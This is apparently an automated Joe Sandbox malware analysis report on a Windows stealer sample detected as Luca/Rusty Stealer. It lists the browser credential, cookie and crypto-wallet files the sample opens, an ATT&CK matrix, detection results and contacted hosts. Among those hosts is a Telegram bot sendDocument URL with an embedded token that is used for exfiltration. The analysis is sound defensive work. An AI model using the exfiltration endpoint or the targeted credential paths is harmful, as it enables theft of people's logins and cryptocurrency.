              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: Yara matchFile source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Luca Stealer
              Source: Yara matchFile source: cOQD62FceM.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.cOQD62FceM.exe.7ff747670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR
              Yara detected Rusty Stealer
              Source: Yara matchFile source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
              Windows Management Instrumentation              		1
              DLL Side-Loading              		11
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		21
              Security Software Discovery              		Remote Services3
              Data from Local System              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Abuse Elevation Control Mechanism              		LSA Secrets1
              System Network Configuration Discovery              		SSHKeylogging4
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              cOQD62FceM.exe50%ReversingLabsWin32.Trojan.Generic
              cOQD62FceM.exe54%VirustotalBrowse
              cOQD62FceM.exe100%AviraHEUR/AGEN.1353232

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              ipwho.is0%VirustotalBrowse
              api.telegram.org2%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
              https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4001%VirustotalBrowse
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
              https://docs.rs/getrandom#nodejs-es-module-supportCalling0%VirustotalBrowse
              https://cdn.ipwhois.io/flags/us.svg0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ipwho.is
              		195.201.57.90
              		truefalseunknown
              api.telegram.org
              		149.154.167.220
              		truetrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ac.ecosia.org/autocomplete?q=cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/chrome_newtabcOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400cOQD62FceM.exe, 00000000.00000003.2590558371.00000190BA826000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606869052.00000190BA826000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://cdn.ipwhois.io/flags/us.svg%cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://duckduckgo.com/ac/?q=cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.icocOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.ecosia.org/newtab/cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.ipwhois.io/flags/us.svgcOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://docs.rs/getrandom#nodejs-es-module-supportCallingcOQD62FceM.exefalseunknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  149.154.167.220
                  		api.telegram.orgUnited Kingdom
                  		62041TELEGRAMRUtrue
                  195.201.57.90
                  		ipwho.isGermany
                  		24940HETZNER-ASDEfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1450352
                  Start date and time:2024-06-01 18:49:46 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 19s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:cOQD62FceM.exe
                  renamed because original name is a hash value
                  Original Sample Name:17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd.exe
                  Detection:MAL
                  Classification:mal96.troj.spyw.evad.winEXE@4/14@2/2
                  EGA Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  149.154.167.220Clipper.exeGet hashmaliciousUnknownBrowse
                    Cryptor.exeGet hashmaliciousLuca StealerBrowse
                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                        9JVOOyGBXT.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          ajb5QcGVGK.exeGet hashmaliciousDCRatBrowse
                            SecuriteInfo.com.Trojan.AutoIt.1390.21633.8031.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Attachments.zipGet hashmaliciousUnknownBrowse
                                DHL DOC..exeGet hashmaliciousAgentTeslaBrowse
                                  hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                    sipari#U015f formu_831512.exeGet hashmaliciousAgentTeslaBrowse
                                      195.201.57.90Clipper.exeGet hashmaliciousUnknownBrowse
                                      • /?output=json
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • /?output=json
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • /?output=json
                                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                                      • /?output=json
                                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                                      • /?output=json
                                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • /?output=json
                                      3r3usOVGsa.exeGet hashmaliciousBlackGuardBrowse
                                      • ipwhois.app/xml/
                                      KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                      • ipwhois.app/xml/
                                      file.exeGet hashmaliciousBlackGuardBrowse
                                      • ipwhois.app/xml/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ipwho.isClipper.exeGet hashmaliciousUnknownBrowse
                                      • 195.201.57.90
                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                      • 195.201.57.90
                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 195.201.57.90
                                      rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                                      • 195.201.57.90
                                      Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                                      • 195.201.57.90
                                      KR6nDu9fLhop1bFe.exeGet hashmaliciousQuasarBrowse
                                      • 195.201.57.90
                                      rust-stealer-xss.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                      • 195.201.57.90
                                      http://nxxoui9ah5qto.pages.dev/smart89Get hashmaliciousUnknownBrowse
